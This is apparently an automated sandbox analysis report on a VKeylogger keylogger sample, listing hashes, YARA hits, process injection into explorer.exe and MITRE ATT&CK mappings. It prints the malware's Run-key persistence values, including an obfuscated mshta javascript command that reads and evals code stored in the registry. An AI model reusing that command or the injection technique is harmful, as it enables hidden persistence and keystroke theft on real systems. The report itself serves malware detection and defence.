vkeylogger | 3367fd9ef4970f0f5a98b1e431c89dab120c098b8a9bed70b8729864931d274a

General

Target

8c5d3c16ae8cb907379a21bfab8cbb56.exe
Size

161KB
MD5

8c5d3c16ae8cb907379a21bfab8cbb56
SHA1

c953abf45094625232a4b7a46ad91948e3f97b9e
SHA256

3367fd9ef4970f0f5a98b1e431c89dab120c098b8a9bed70b8729864931d274a
SHA512

25fc4b10d8e44b80a2bd47d3413ce99f647d1ad083fdc3c56e5c47e9d24deed0bcd1b998cbdf7ae672edc087d4d1c6b5773150471b189ee635336257ddc2b878

Score

10^/10

vkeylogger keylogger persistence stealer

Malware Config

Signatures

VKeylogger
A keylogger first seen in Nov 2020.
stealer keylogger vkeylogger

VKeylogger Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4076-116-0x00000000008F0000-0x00000000008FE000-memory.dmp	family_vkeylogger
behavioral2/memory/4076-117-0x0000000000400000-0x000000000081A000-memory.dmp	family_vkeylogger
behavioral2/memory/816-119-0x0000000000C20000-0x0000000000C2F000-memory.dmp	family_vkeylogger

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

explorer.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\Firefox_update = "C:\\Windows\\system32\\mshta.exe javascript:x=new%20ActiveXObject(\"wscript.shell\");v=x.RegRead(\"HKCU\\\\Software\\\\Microsoft\\\\SMSvcHost\\\\ComponentID\");eval(v);"	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeDriver = "C:\\Users\\Admin\\AppData\\Local\\Temp\\8c5d3c16ae8cb907379a21bfab8cbb56.exe"	explorer.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

8c5d3c16ae8cb907379a21bfab8cbb56.exe

description pid process target process

PID 4076 set thread context of 816 4076 8c5d3c16ae8cb907379a21bfab8cbb56.exe explorer.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

8c5d3c16ae8cb907379a21bfab8cbb56.exeexplorer.exe

pid process

4076 8c5d3c16ae8cb907379a21bfab8cbb56.exe
816 explorer.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

explorer.exe

pid process

816 explorer.exe

description	pid	process	target process
PID 4076 set thread context of 816	4076	8c5d3c16ae8cb907379a21bfab8cbb56.exe	explorer.exe

pid	process
4076	8c5d3c16ae8cb907379a21bfab8cbb56.exe
816	explorer.exe

pid	process
816	explorer.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

8c5d3c16ae8cb907379a21bfab8cbb56.exe

description	pid	process	target process
PID 4076 wrote to memory of 816	4076	8c5d3c16ae8cb907379a21bfab8cbb56.exe	explorer.exe
PID 4076 wrote to memory of 816	4076	8c5d3c16ae8cb907379a21bfab8cbb56.exe	explorer.exe
PID 4076 wrote to memory of 816	4076	8c5d3c16ae8cb907379a21bfab8cbb56.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\8c5d3c16ae8cb907379a21bfab8cbb56.exe
"C:\Users\Admin\AppData\Local\Temp\8c5d3c16ae8cb907379a21bfab8cbb56.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4076

C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe"
2⤵
- Adds Run key to start application
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
PID:816

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/816-118-0x0000000000C22E90-mapping.dmp

Download
memory/816-119-0x0000000000C20000-0x0000000000C2F000-memory.dmp

Filesize
60KB

Download
memory/4076-116-0x00000000008F0000-0x00000000008FE000-memory.dmp

Filesize
56KB

Download
memory/4076-115-0x0000000000030000-0x000000000003A000-memory.dmp

Filesize
40KB

Download
memory/4076-117-0x0000000000400000-0x000000000081A000-memory.dmp

Filesize
4.1MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads